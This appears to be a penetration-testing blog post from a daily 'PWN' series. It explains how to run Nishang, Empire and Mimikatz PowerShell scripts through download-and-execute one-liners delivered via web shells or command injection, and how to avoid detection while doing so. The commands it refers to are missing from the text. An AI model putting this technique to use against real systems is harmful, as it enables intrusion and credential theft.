Day 76: Use Nishang/Empire and Other Ps1 Scripts ‘Manually’.

Find Interesting Scripts

First, we want to figure out what we have after we have installed Nishang, Empire and other offensive Powershell Testing Frameworks, to do this just try the following:

You should have something like this excerpt taken from one of my lab VMs…

Some of those things sound awesome right? Like Code Execution, Persistence, Pivot, Exfil and much more this is enough to get any offensive security tester wet around the lips. But what if we don’t want to use a full framework and we just want to run a single command? Try this to download and run at the same time.

Example with Mimikatz

Mimikatz we know well, but others not so much, in those cases it’s important we see what they do or it might get us noticed, kill our shell or worse, BSOD. So, we should be careful and check the code first.

You will generally see something like this…

The most important line is this…

Always check this, some people are not consistent with naming conventions and you might have to use your head, but for those who don’t know the function name is what you need to call to invoke it.

The rest of the script gives you info etc and other examples of running the scripts.

For us, all we need to do to download this file and execute it is this one line…

Pentest Box

Windows Shell

In your windows terminal, you will see the output from the script, it really is that easy. Now spend some time looking at .ps1 scripts and seeing what you can do. Powershell is dying in some of the more secure corporate environments but for the rest, Powershell is still a titan of pwnage, a gift that keeps on giving.

Of course, some scripts need elevated privileges so I ran this in admin prompt to show one-liner in action. This can be delivered from anywhere, web shells, command injection, low privilege shells etc

Security Researcher / 365 Days of PWN